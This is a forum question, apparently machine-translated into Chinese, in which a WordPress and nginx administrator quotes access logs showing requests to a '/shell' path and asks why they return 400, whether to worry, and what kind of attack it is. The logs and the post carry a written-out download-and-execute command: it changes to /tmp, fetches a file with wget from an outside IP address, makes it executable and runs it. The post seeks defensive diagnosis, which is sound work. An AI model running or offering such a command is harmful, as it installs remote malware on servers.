Ang*_*EX. 7 php wordpress shell nginx
我在我的网站上使用 Wordpress,最近我阻止了一名黑客,该黑客用大量后门(字面意思是数千个后门)感染了我的网站。我花了一个半月的时间跟他打赌。这不是我的错,在我之前担任我工作的人从未更新过该网站。
在此之后,我注意到对不存在的文件的一些奇怪的访问,我认为黑客正试图从我不使用的 WordPress 插件中找到已知的漏洞。没关系,我根本不在乎。但其中一项尝试引起了我的注意。
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
我隐藏了部分网址,抱歉。
IP 始终会发生变化,即使是相差不到一秒的连续请求,也可能是 DDoS。用户代理通常也会发生变化,这里有一切:iPhone、iPad、Android、Windows 7、8、10、Firefox、Google Chrome、Internet Explorer...但 Linux 和 Mac。这 3 个请求是唯一的例外。
我注意到 URL 中有一些 shell 命令。这些:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1
我的 /tmp 目录中没有具有此名称的文件夹或文件。
这个“karin”网址是一个已经不存在很长时间的旧网站。我不知道他是怎么知道这个网址的,就连我自己也不知道。每次我尝试访问 NGINX 上配置的某个 URL,但路径不存在(如这个 karin)时,我都会收到 404 错误。但这些尝试给出了 400 错误。
404是正常的,因为这里什么都没有。但400?意思是这里有东西,但是无法处理发送的数据。我删除了这个URL的nginx配置,并在其他URL中尝试了它。我总是收到 404 错误,我尝试了以下方法:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
所以我的问题是:我应该害怕这个命令在这个 URL 上返回 400 错误吗?为什么我无法重现这个?显然这些尝试失败了,我应该确定它们失败了吗?这是哪种类型的攻击?我从来没有听说过这样的“通过 URL 进行 shell 脚本注入”。
| 归档时间: |
|
| 查看次数: |
10390 次 |
| 最近记录: |